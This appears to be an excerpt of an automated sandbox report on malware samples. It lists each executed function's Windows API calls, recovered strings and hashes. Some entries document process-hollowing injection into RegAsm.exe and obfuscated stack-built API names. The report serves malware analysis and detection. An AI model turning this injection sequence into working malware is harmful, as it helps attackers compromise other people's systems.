VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 026D020A

Memory Dump Source

Source File: 0000000C.00000002.2521250191.00000000026BE000.00000040.00000020.00020000.00000000.sdmp, Offset: 026BE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_26be000_pZhQ7nTCR9R3A5r5QIQYLapT.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 678d1eb0738d91b83c256903a1d1db13e5a11693fb7f5e8c1811497a46dc8b79
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 02113C79A00208FFDB01DF98C985E99BBF5AF08350F058094F9489B361D371EA50DF84

Function 00401925 Relevance: 1.3, APIs: 1, Instructions: 46
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 0000000C.00000002.2504777380.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_pZhQ7nTCR9R3A5r5QIQYLapT.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F

Analysis Process: RK8ajtyf9pvKlaXEo3EjTbnu.exePID: 7964, Parent PID: 7504COMMON

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 027B21A5 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 027B2314
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 027B2327
Wow64GetThreadContext.KERNEL32(?,00000000), ref: 027B2345
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 027B2369
VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 027B2394
WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 027B23EC
WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 027B2437
WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 027B2475
Wow64SetThreadContext.KERNEL32(?,?), ref: 027B24B1
ResumeThread.KERNELBASE(?), ref: 027B24C0

Strings

ress, xrefs: 027B222F
Load, xrefs: 027B21E3
GetP, xrefs: 027B2227
aryA, xrefs: 027B21EB

Memory Dump Source

Source File: 0000000D.00000002.1739719895.00000000027B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_27b2000_RK8ajtyf9pvKlaXEo3EjTbnu.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: GetP$Load$aryA$ress
API String ID: 2687962208-977067982
Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction ID: 35acabfe5cf36df90b56014de3727f1e7a334ae092cdbe146845b6bef1b07ad3
Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction Fuzzy Hash: 86B1D57664124AAFDB60CF68CC80BDA77A5FF88714F158124EA0CEB342D774FA418B94

Function 00D70BEF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 295
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(037B3590,?,?,?,?,?,?,?,?,00000000,00000000,?,00D70A78,00000001,00000040), ref: 00D70FF9

Strings

&S!, xrefs: 00D70C87
<1i;, xrefs: 00D70DEC

Memory Dump Source

Source File: 0000000D.00000002.1706998492.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_d70000_RK8ajtyf9pvKlaXEo3EjTbnu.jbxd

Similarity

API ID: ProtectVirtual
String ID: &S!$<1i;
API String ID: 544645111-1770337207
Opcode ID: 549042ba0a8c58d548116eee26cda3deb95bb7e5f2e3356006c4b520cba2874f
Instruction ID: dc4bf93f1cf385bff8482613235b579deada30ddbe300c8ca63ba8682a2ddefa
Opcode Fuzzy Hash: 549042ba0a8c58d548116eee26cda3deb95bb7e5f2e3356006c4b520cba2874f
Instruction Fuzzy Hash: F5C16970A04259DFCB11CFA9C980AEDFBF1BF49310F64C599E458AB286D730AD45CBA4

Function 00D70988 Relevance: 1.6, APIs: 1, Instructions: 135
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000D.00000002.1706998492.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_d70000_RK8ajtyf9pvKlaXEo3EjTbnu.jbxd

Similarity

API ID: ConsoleFree
String ID:
API String ID: 771614528-0
Opcode ID: 5353a8c91a80bd95cefc9e45c490c497e60b6703ae9ffe5ac01aeb5f9279b91b
Instruction ID: 64d14c6b87c13f89e6491198b4b7d8937bfe9c31fd87f83db391c566584befcc
Opcode Fuzzy Hash: 5353a8c91a80bd95cefc9e45c490c497e60b6703ae9ffe5ac01aeb5f9279b91b
Instruction Fuzzy Hash: 6251AB70A00348DFDB01EBA9D845B9EBBF1EF85310F14C569D1189B291EB74AA45CFA1

Function 00D71031 Relevance: 1.6, APIs: 1, Instructions: 69
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,?,00000000,?,?,?,?,?,00000000,00000000,?,00D70AA8,?,00000000,?), ref: 00D710D1

Memory Dump Source

Source File: 0000000D.00000002.1706998492.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_d70000_RK8ajtyf9pvKlaXEo3EjTbnu.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: db527f35f0f99f95b8ef263c9a8da1cfb53e2e7522ab7b46bf9f1d691fdae0da
Instruction ID: cf594e2e81e697aeb2ed12a1253d143c9c3304c191f9f16c0a00b6a06af792b1
Opcode Fuzzy Hash: db527f35f0f99f95b8ef263c9a8da1cfb53e2e7522ab7b46bf9f1d691fdae0da
Instruction Fuzzy Hash: 4021E2B59012499FCB10CF9AD984BDEBBF4FB49310F10842AE858A7350D375AA54CFA5

Function 00D7051C Relevance: 1.6, APIs: 1, Instructions: 68
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,?,00000000,?,?,?,?,?,00000000,00000000,?,00D70AA8,?,00000000,?), ref: 00D710D1

Memory Dump Source

Source File: 0000000D.00000002.1706998492.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_d70000_RK8ajtyf9pvKlaXEo3EjTbnu.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 8f6948a4f737467e7cbf01faeeb54d6adeda7f976c999cb3a70c4c0d31167977
Instruction ID: 3dd53493f096879dd51a03cc2439efced97b285751981624a4804296d45ea4ed
Opcode Fuzzy Hash: 8f6948a4f737467e7cbf01faeeb54d6adeda7f976c999cb3a70c4c0d31167977
Instruction Fuzzy Hash: 9121F3B59013499FCB10CF9AD984BDEBBF4FB48310F10852AE858A7340D375AA54CFA5

Function 00D704DF Relevance: 1.6, APIs: 1, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeConsole.KERNELBASE ref: 00D70B2C

Memory Dump Source

Source File: 0000000D.00000002.1706998492.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_d70000_RK8ajtyf9pvKlaXEo3EjTbnu.jbxd

Similarity

API ID: ConsoleFree
String ID:
API String ID: 771614528-0
Opcode ID: 0c114d9144606b4ba0a01e017864587d0f1b653a5ecf7bc4926b4020e0a28516
Instruction ID: 9c307c8fbdf2cd3d70a3a1b0e3ad546656b564a80232e6d09e0553c610d6b1a0
Opcode Fuzzy Hash: 0c114d9144606b4ba0a01e017864587d0f1b653a5ecf7bc4926b4020e0a28516
Instruction Fuzzy Hash: FA216A71809388CFDB11DFA9C4907DEBFF0EF0A224F14809AD454AB251D378A948CFA6

Function 00D70510 Relevance: 1.6, APIs: 1, Instructions: 54
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(037B3590,?,?,?,?,?,?,?,?,00000000,00000000,?,00D70A78,00000001,00000040), ref: 00D70FF9

Memory Dump Source

Source File: 0000000D.00000002.1706998492.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_d70000_RK8ajtyf9pvKlaXEo3EjTbnu.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 8453177e024463b79cb0fa60798af43ca3e45d926a381499c68927ade9881493
Instruction ID: 353aebf81ed731a9f9aa8d4d207ce27301addc914d5799b6745b91f1d3bedd2c
Opcode Fuzzy Hash: 8453177e024463b79cb0fa60798af43ca3e45d926a381499c68927ade9881493
Instruction Fuzzy Hash: 4F21E0B5905259AFCB10CF9AD884ADEFBB4FB08310F10812AE918A7240D3B4A954CFA5

Function 00D70504 Relevance: 1.5, APIs: 1, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeConsole.KERNELBASE ref: 00D70B2C

Memory Dump Source

Source File: 0000000D.00000002.1706998492.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_d70000_RK8ajtyf9pvKlaXEo3EjTbnu.jbxd

Similarity

API ID: ConsoleFree
String ID:
API String ID: 771614528-0
Opcode ID: ed77779e3aa85501c843d25c5a366edffc80942aa6150fbdf8027180c13df449
Instruction ID: ad91728f4fdf20ebe8e2cb5572896b5ed5128c4284ad78845e9880b62ffaf140
Opcode Fuzzy Hash: ed77779e3aa85501c843d25c5a366edffc80942aa6150fbdf8027180c13df449
Instruction Fuzzy Hash: FA1112B4804748CFCB20DF9AD485BDEBBF4EB08324F208069D529A7380D375AA44CFA1

Function 00D70AC9 Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeConsole.KERNELBASE ref: 00D70B2C

Memory Dump Source

Source File: 0000000D.00000002.1706998492.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_d70000_RK8ajtyf9pvKlaXEo3EjTbnu.jbxd

Similarity

API ID: ConsoleFree
String ID:
API String ID: 771614528-0
Opcode ID: 0e30107740e8add265e10073cc711063638a9d404dbf648a45477ab37673bf98
Instruction ID: 9525dad749ae80f84254e99d55b83896bcfc2d800f75b21ee5b82833d19b3b3a
Opcode Fuzzy Hash: 0e30107740e8add265e10073cc711063638a9d404dbf648a45477ab37673bf98
Instruction Fuzzy Hash: 241112B5804248CFCB20CF9AD485BEEBFF0EB48314F24855AD469A7690D3796A44CFA1

Function 00D1D005 Relevance: .1, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000D.00000002.1706750473.0000000000D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_d1d000_RK8ajtyf9pvKlaXEo3EjTbnu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfbab493d13826e5c31180de65f2c34d18e1118629d59aa0cd739ebe016ed0c1
Instruction ID: 940a4c4e8f4586553730cc7b97125bb4ad06ac4645891ec2953d6827ea7f0393
Opcode Fuzzy Hash: bfbab493d13826e5c31180de65f2c34d18e1118629d59aa0cd739ebe016ed0c1
Instruction Fuzzy Hash: 2C31342140E3D05FD7038B24A8A46A27F749F17220F1E80DBD889CF0A7C6699C89C732

Function 00D1D059 Relevance: .0, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000D.00000002.1706750473.0000000000D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_d1d000_RK8ajtyf9pvKlaXEo3EjTbnu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d29d53db6523d0a75702f369cb0cfa183cde294c452d41c6d5bf4d6d4b9beff
Instruction ID: 99c687115684079d06815999395c7655ec3ab6bca864afd7176a1ebf1ab54af1
Opcode Fuzzy Hash: 5d29d53db6523d0a75702f369cb0cfa183cde294c452d41c6d5bf4d6d4b9beff
Instruction Fuzzy Hash: EB01DB7110C344BBE7204A26EC847E7BBD9DF49334F1CC55AED490A286C779D881CA72

Analysis Process: kCxbYlQ2A6NZXLbKZjtnUx3R.exePID: 7972, Parent PID: 7504COMMON

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 031521A5 Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,03152117,03152107), ref: 03152314
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 03152327
Wow64GetThreadContext.KERNEL32(000003A8,00000000), ref: 03152345
ReadProcessMemory.KERNELBASE(000003AC,?,0315215B,00000004,00000000), ref: 03152369
VirtualAllocEx.KERNELBASE(000003AC,?,?,00003000,00000040), ref: 03152394
WriteProcessMemory.KERNELBASE(000003AC,00000000,?,?,00000000,?), ref: 031523EC
WriteProcessMemory.KERNELBASE(000003AC,00400000,?,?,00000000,?,00000028), ref: 03152437
WriteProcessMemory.KERNELBASE(000003AC,?,?,00000004,00000000), ref: 03152475
Wow64SetThreadContext.KERNEL32(000003A8,03110000), ref: 031524B1
ResumeThread.KERNELBASE(000003A8), ref: 031524C0

Strings

SetThreadContext, xrefs: 031522CB
Load, xrefs: 031521E3
GetP, xrefs: 03152227
aryA, xrefs: 031521EB
GetThreadContext, xrefs: 0315227F
TerminateProcess, xrefs: 031523A3
VirtualAlloc, xrefs: 0315226C
VirtualAllocEx, xrefs: 031522A5
ReadProcessMemory, xrefs: 03152292
ress, xrefs: 0315222F
WriteProcessMemory, xrefs: 031522B8
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 03152313
ResumeThread, xrefs: 031522E1
CreateProcessA, xrefs: 03152259

Memory Dump Source

Source File: 0000000E.00000002.1735076126.0000000003152000.00000040.00000800.00020000.00000000.sdmp, Offset: 03152000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3152000_kCxbYlQ2A6NZXLbKZjtnUx3R.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2687962208-1257834847
Opcode ID: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
Instruction ID: 4f2a2c69e6f0f9a04247fee18bc319440fb4de14eebaf2847e89dc71733a3fb1
Opcode Fuzzy Hash: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
Instruction Fuzzy Hash: D2B1E67660024AAFDB60CF68CC80BDA77A5FF8C714F158564EA1CAB341D774FA418B94

Function 01500BD0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 294
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(04153590,?,00000001,0000012C,?,?,?,00000000,00000000,?,01500A73,00000001,00000040), ref: 01500FD9

Strings

<1i;, xrefs: 01500DCC
&S!, xrefs: 01500C67

Memory Dump Source

Source File: 0000000E.00000002.1656701406.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1500000_kCxbYlQ2A6NZXLbKZjtnUx3R.jbxd

Similarity

API ID: ProtectVirtual
String ID: &S!$<1i;
API String ID: 544645111-1770337207
Opcode ID: 64276c635c9864e68ed77f7ac71665a944c7326682eb3ca01d66998daae37a7d
Instruction ID: 8f861d3f5552da94c6835e45e42447e61310031b4b97f22b4a5e6a9cdb4988b6
Opcode Fuzzy Hash: 64276c635c9864e68ed77f7ac71665a944c7326682eb3ca01d66998daae37a7d
Instruction Fuzzy Hash: FEC17E70A042598FCB12CFA9C5807EDFBF1BF49314F648599E858AB286C734AD41CFA4

Function 01500500 Relevance: 1.6, APIs: 1, Instructions: 54
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(04153590,?,00000001,0000012C,?,?,?,00000000,00000000,?,01500A73,00000001,00000040), ref: 01500FD9

Memory Dump Source

Source File: 0000000E.00000002.1656701406.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1500000_kCxbYlQ2A6NZXLbKZjtnUx3R.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 508f7455fee16fb465a72b2a9d05aa8b98928c2cd43f220c9380df3e1b903385
Instruction ID: f7dd8735b9cb065d077391a60f08234630296b99b8a17b06efa5d487ccfa7920
Opcode Fuzzy Hash: 508f7455fee16fb465a72b2a9d05aa8b98928c2cd43f220c9380df3e1b903385
Instruction Fuzzy Hash: 6321C3B590565DAFCB00DF9AD884BDEFBB4FB48314F10812AE918A7240C374A954CFA5

Function 014AD006 Relevance: .1, Instructions: 79
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000E.00000002.1656275196.00000000014AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_14ad000_kCxbYlQ2A6NZXLbKZjtnUx3R.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b77ba39725006eed8b797d86adc5c02cb613c057b7e24744ca5a2192364bab46
Instruction ID: d9cc8667a0c75904f1245948f229afc344b872e1861bb9315b997981bc032e15
Opcode Fuzzy Hash: b77ba39725006eed8b797d86adc5c02cb613c057b7e24744ca5a2192364bab46
Instruction Fuzzy Hash: E721FFA154E3D09FD7138B258CA4652BF78AF53224F4E80DBD888CF5B7C2694849CB72

Function 014AD059 Relevance: .0, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000E.00000002.1656275196.00000000014AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_14ad000_kCxbYlQ2A6NZXLbKZjtnUx3R.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83db2d1396d224ac74131ad8c0438ceb2da6ad72fb2d36d76083a3e29d5aff49
Instruction ID: 05c8c1a5c755a0b6368423cf55dee9e58d296d73426c43b1c89ac8aebffc4ef9
Opcode Fuzzy Hash: 83db2d1396d224ac74131ad8c0438ceb2da6ad72fb2d36d76083a3e29d5aff49
Instruction Fuzzy Hash: 5B012BB194C304EBE7204B65DC84767BFD8DF61278F58C41BED080A6A7C3759441CAB2

Analysis Process: h687rYoqxN2Ss_wvNXD9qqhf.exePID: 7984, Parent PID: 7504COMMON

Executed Functions

Function 004090EF Relevance: 49.5, APIs: 1, Strings: 27, Instructions: 476
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

y, xrefs: 0040A4DE
r, xrefs: 0040A4D7
t, xrefs: 00409FF0
a, xrefs: 00409FFE
l, xrefs: 0040A005
L, xrefs: 0040A4B4
i, xrefs: 00409FE2
o, xrefs: 0040A49F
a, xrefs: 0040A4A6
W, xrefs: 0040A4E5
i, xrefs: 0040A4BB
L, xrefs: 0040A498
d, xrefs: 0040A4AD
P, xrefs: 0040A00C
t, xrefs: 0040A021
3849, xrefs: 0040A3A1
r, xrefs: 0040A013
e, xrefs: 0040A028
a, xrefs: 0040A4D0
V, xrefs: 00409FDB
u, xrefs: 00409FF7
r, xrefs: 00409FE9
b, xrefs: 0040A4C2
c, xrefs: 0040A02F
o, xrefs: 0040A01A
r, xrefs: 0040A4C9
t, xrefs: 0040A036

Memory Dump Source

Source File: 0000000F.00000002.2154192327.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2154165853.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154283981.0000000000525000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154339002.00000000005A8000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154361694.00000000005AA000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154452037.00000000005AB000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154474637.00000000005B2000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154518138.00000000005CA000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154563942.0000000000633000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154599755.0000000000664000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154599755.0000000000666000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154651763.000000000066A000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154675812.0000000000673000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154697515.0000000000676000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154721890.000000000067D000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154745993.0000000000680000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154767280.0000000000689000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154791817.000000000068E000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154906339.00000000006BC000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154930760.00000000006C0000.00000040.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_h687rYoqxN2Ss_wvNXD9qqhf.jbxd

Yara matches

Similarity

API ID:
String ID: 3849$L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
API String ID: 0-829924176
Opcode ID: 8a0d27ef46159b5c9f57bcb0f393f7e027e7c54a539802678ae75c04171ea4d9
Instruction ID: c3c3b3738dbee97888d9377540ecd2a8c239df3a19c682bddb3ac86f50dd1e95
Opcode Fuzzy Hash: 8a0d27ef46159b5c9f57bcb0f393f7e027e7c54a539802678ae75c04171ea4d9
Instruction Fuzzy Hash: B80236B1D092A89AF7208B24DC447EA7BB5EF51304F0441FAC84DA7282D67E5FC5CB96

Function 004090E6 Relevance: 49.5, APIs: 1, Strings: 27, Instructions: 475
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

y, xrefs: 0040A4DE
r, xrefs: 0040A4D7
t, xrefs: 00409FF0
a, xrefs: 00409FFE
l, xrefs: 0040A005
L, xrefs: 0040A4B4
i, xrefs: 00409FE2
o, xrefs: 0040A49F
a, xrefs: 0040A4A6
W, xrefs: 0040A4E5
i, xrefs: 0040A4BB
L, xrefs: 0040A498
d, xrefs: 0040A4AD
P, xrefs: 0040A00C
t, xrefs: 0040A021
3849, xrefs: 0040A3A1
r, xrefs: 0040A013
e, xrefs: 0040A028
a, xrefs: 0040A4D0
V, xrefs: 00409FDB
u, xrefs: 00409FF7
r, xrefs: 00409FE9
b, xrefs: 0040A4C2
c, xrefs: 0040A02F
o, xrefs: 0040A01A
r, xrefs: 0040A4C9
t, xrefs: 0040A036

Memory Dump Source

Source File: 0000000F.00000002.2154192327.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2154165853.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154283981.0000000000525000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154339002.00000000005A8000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154361694.00000000005AA000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154452037.00000000005AB000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154474637.00000000005B2000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154518138.00000000005CA000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154563942.0000000000633000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154599755.0000000000664000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154599755.0000000000666000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154651763.000000000066A000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154675812.0000000000673000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154697515.0000000000676000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154721890.000000000067D000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154745993.0000000000680000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154767280.0000000000689000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154791817.000000000068E000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154906339.00000000006BC000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000F.00000002.2154930760.00000000006C0000.00000040.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_h687rYoqxN2Ss_wvNXD9qqhf.jbxd

Yara matches

Similarity

API ID:
String ID: 3849$L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
API String ID: 0-829924176
Opcode ID: 9670bfd42258927fdb95e3d79b8bed6cdd768bc71171ca6a6b04db4d8a0a82c7
Instruction ID: 2f17bd28fb04ae39e4b9f93a89fb21d0b7bf282c4a203d9e66a8694fb2e18a0c
Opcode Fuzzy Hash: 9670bfd42258927fdb95e3d79b8bed6cdd768bc71171ca6a6b04db4d8a0a82c7
Instruction Fuzzy Hash: 650236B1D092A89AF7208B24DC447EA7BB4EF51304F0441FAD84DA7282D67E5FC5CB96

Function 00409037 Relevance: 49.4, APIs: 1, Strings: 27, Instructions: 420COMMON

Download Yara Rule

Strings

y, xrefs: 0040A4DE
r, xrefs: 0040A4D7
t, xrefs: 00409FF0
a, xrefs: 00409FFE
l, xrefs: 0040A005
L, xrefs: 0040A4B4
i, xrefs: 00409FE2
o, xrefs: 0040A49F
a, xrefs: 0040A4A6
W, xrefs: 0040A4E5
i, xrefs: 0040A4BB
L, xrefs: 0040A498
d, xrefs: 0040A4AD
P, xrefs: 0040A00C
t, xrefs: 0040A021
3849, xrefs: 0040A3A1
r, xrefs: 0040A013
e, xrefs: 0040A028
a, xrefs: 0040A4D0
V, xrefs: 00409FDB
u, xrefs: 00409FF7
r, xrefs: 00409FE9
